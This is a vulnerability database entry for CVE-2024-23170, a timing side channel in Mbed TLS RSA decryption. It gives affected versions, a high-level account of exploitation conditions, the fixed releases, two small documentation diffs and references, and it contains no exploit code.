CVE-2024-23170
Description
Mbed TLS RSA private key operations have a timing side channel allowing plaintext recovery via many decryption messages.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Mbed TLS RSA private key operations have a timing side channel allowing plaintext recovery via many decryption messages.
Vulnerability
Mbed TLS 2.x before 2.28.7 and 3.x before 3.5.2 are vulnerable to a timing side channel in private key RSA operations [1]. An attacker can recover plaintext by exploiting precise timing measurements of decryption operations.
Exploitation
An attacker needs to send a large number of messages for decryption and have precise enough timing measurements, which can be achieved from a local position or a remote network location close to the victim [1]. The attack is described in the "Everlasting ROBOT: the Marvin Attack" by Hubert Kario.
Impact
Successful exploitation leads to recovery of the plaintext of RSA-encrypted messages [1], resulting in a confidentiality breach.
Mitigation
The vulnerability is fixed in Mbed TLS versions 2.28.7 and 3.5.2 [1]. Users should upgrade to these versions. No workaround is available.
AI Insight generated on May 25, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products
7- Mbed TLS/Mbed TLSdescription
- osv-coords4 versionspkg:rpm/opensuse/mbedtls-2&distro=openSUSE%20Tumbleweedpkg:rpm/opensuse/mbedtls&distro=openSUSE%20Leap%2015.5pkg:rpm/opensuse/mbedtls&distro=openSUSE%20Tumbleweedpkg:rpm/suse/mbedtls&distro=SUSE%20Package%20Hub%2015%20SP5
< 2.28.7-1.1+ 3 more
- (no CPE)range: < 2.28.7-1.1
- (no CPE)range: < 2.28.7-bp155.2.3.1
- (no CPE)range: < 3.5.2-1.1
- (no CPE)range: < 2.28.7-bp155.2.3.1
Patches
21 file changed · +1 −1
BRANCHES.md+1 −1 modified@@ -106,6 +106,6 @@ The following branches are currently maintained: - [`development`](https://github.com/Mbed-TLS/mbedtls/) - [`mbedtls-2.28`](https://github.com/Mbed-TLS/mbedtls/tree/mbedtls-2.28) maintained until at least the end of 2024, see - <https://github.com/Mbed-TLS/mbedtls/releases/tag/v2.28.6>. + <https://github.com/Mbed-TLS/mbedtls/releases/tag/v2.28.7>. Users are urged to always use the latest version of a maintained branch.
1 file changed · +1 −1
BRANCHES.md+1 −1 modified@@ -76,6 +76,6 @@ The following branches are currently maintained: - [`development`](https://github.com/Mbed-TLS/mbedtls/) - [`mbedtls-2.28`](https://github.com/Mbed-TLS/mbedtls/tree/mbedtls-2.28) maintained until at least the end of 2024, see - <https://github.com/Mbed-TLS/mbedtls/releases/tag/v2.28.6>. + <https://github.com/Mbed-TLS/mbedtls/releases/tag/v2.28.7>. Users are urged to always use the latest version of a maintained branch.
Vulnerability mechanics
No source-code context for this CVE — mechanics is only generated when we can read the actual fix diff. Without that, the four sections (root cause, attack vector, affected code, fix) would be speculation rather than analysis.
References
5- mbed-tls.readthedocs.io/en/latest/security-advisories/mbedtls-security-advisory-2024-01-1/nvdVendor Advisory
- lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/GP5UU7Z6LJNBLBT4SC5WWS2HDNMTFZH5/nvd
- lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/IIBPEYSVRK4IFLBSYJAWKH33YBNH5HR2/nvd
- lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/GP5UU7Z6LJNBLBT4SC5WWS2HDNMTFZH5/nvd
- lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/IIBPEYSVRK4IFLBSYJAWKH33YBNH5HR2/nvd
News mentions
0No linked articles in our index yet.